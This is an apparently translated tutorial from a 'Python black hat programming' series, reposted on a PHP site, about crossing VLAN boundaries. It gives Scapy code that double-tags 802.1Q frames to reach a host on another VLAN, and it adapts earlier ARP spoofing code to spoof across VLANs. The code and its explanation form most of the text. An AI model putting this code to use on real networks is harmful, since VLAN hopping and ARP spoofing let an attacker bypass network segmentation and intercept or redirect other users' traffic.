VLAN (VirtualLocalAreaNetwork) is a virtual network built based on Ethernet interaction technology. it can divide a physical network into multiple valns or overcome physical network barriers, users in different subnets are allocated to the same VLAN. This article mainly introduces Python black hat programming 3.4 Cross-VLAN information. For more information, see Virtual Local Area Network (VLAN). It is a Virtual Network built based on Ethernet interaction technology, the same physical network can be divided into multiple valns, and users in different subnets can be allocated to the same VLAN across physical network barriers. Is an example of VLAN division.
#!/usr/bin/python from scapy.all import * packet = Ether(dst="c0:d3:de:ad:be:ef") / \Dot1Q(vlan=1) / \Dot1Q(vlan=2) / \IP(dst="192.168.13.3") / \ICMP() sendp(packet)
The above code specifies the MAC address and IP address of the target host, and adds two VLAN ids. The first is the VLAN of the host that sends data, and the second is the VLAN of the target host. The switch removes the first identifier and forwards the packet to the target host when reading the second identifier.
3.4.2 Cross-vlan arp spoofing
We are discussing ARP spoofing in sections 3.1, 3.2, and 3.3. because VLAN limits broadcast domains, our previous code cannot perform ARP spoofing across VLANs. To solve this problem, we only need to insert VLAN IDs in the previously constructed ARP spoofing data. The following code constructs an ARP Request packet in section 3.1.
def build_req():if options.target is None:pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])elif options.target:target_mac = getmacbyip(options.target)if target_mac is None:print "[-] Error: Could not resolve targets MAC address"sys.exit(1)pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)return pkt
In the packet construction section, we insert the vlan id:
pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
In this way, cross-vlan arp spoofing can be achieved.
3.4.3 summary
This section describes how to construct packets that deceive VLANs to achieve cross-VLAN data communication and ARP spoofing. It should be noted that the methods in this article mainly aim at the 802.1Q protocol, and there is no effect on VLAN physically isolated by Port.
The above is a detailed explanation of Python black hat programming 3.4 spanning VLAN. I hope it will help you. if you have any questions, please leave a message and I will reply to you in a timely manner. I would like to thank you for your support for PHP chinnet!
For more Python black hat programming 3.4 cross VLAN articles, please follow the PHP Chinese network!